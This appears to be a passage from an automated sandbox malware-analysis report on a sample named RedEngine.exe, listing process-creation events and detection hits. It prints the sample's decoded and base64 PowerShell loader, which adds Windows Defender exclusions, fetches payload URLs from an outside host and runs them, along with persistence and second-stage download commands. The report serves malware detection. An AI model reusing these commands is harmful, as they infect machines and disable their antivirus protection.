                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB040B3028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFB040B3028
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB040B2A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB040B2A70
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B48AA7C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFB0B48AA7C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B48A050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB0B48A050
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB226C5FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFB226C5FA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B9C62C SetUnhandledExceptionFilter,38_2_00007FF795B9C62C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00007FF795BA9924
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00007FF795B9C44C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00007FF795B9BBC0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B9C62C SetUnhandledExceptionFilter,42_2_00007FF795B9C62C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF795BA9924
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF795B9C44C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FF795B9BBC0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D633028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB0D633028
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB0D632A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB0D632A70
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3C38A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C3C38A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C3C3E60 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB1C3C3E60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C541260 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C541260
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C69DEDC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB1C69DEDC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C69D4C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB1C69D4C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB2272A050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB2272A050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB2272AA7C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB2272AA7C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AC1AA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB23AC1AA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AC14E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23AC14E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF5FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23AF5FA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF6534 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFB23AF6534
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23B20AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFB23B20AA8
                        Source: C:\Users\user\Desktop\RedEngine.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7768.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_1316.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: mgne4i3n.t1d1.exe PID: 6160, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1316, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat, type: DROPPED
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Adds extensions / path to Windows Defender exclusion list
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Encrypted powershell cmdline option found
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: Base64 decoded <#blw#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;";<#emv#> Add-MpPreference <#ujf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uqm#> -Force <#wwx#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/pancek61111111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#mct#> (Join-Path <#jmi#> -Path $env:AppData <#ign#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#vix#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#wet#> (Join-Path -Path $env:AppData <#vvx#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#xli#>
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: Base64 decoded <#blw#>Start-Process powershell -WindowStyle Hidden -ArgumentList "Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;";<#emv#> Add-MpPreference <#ujf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uqm#> -Force <#wwx#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/pancek61111111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#mct#> (Join-Path <#jmi#> -Path $env:AppData <#ign#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#vix#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#wet#> (Join-Path -Path $env:AppData <#vvx#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#xli#>Jump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>; Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 1251
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "dota2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im dota2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im cs2.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "RustClient.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im RustClient.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "GTA5.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im GTA5.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "tf_win64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
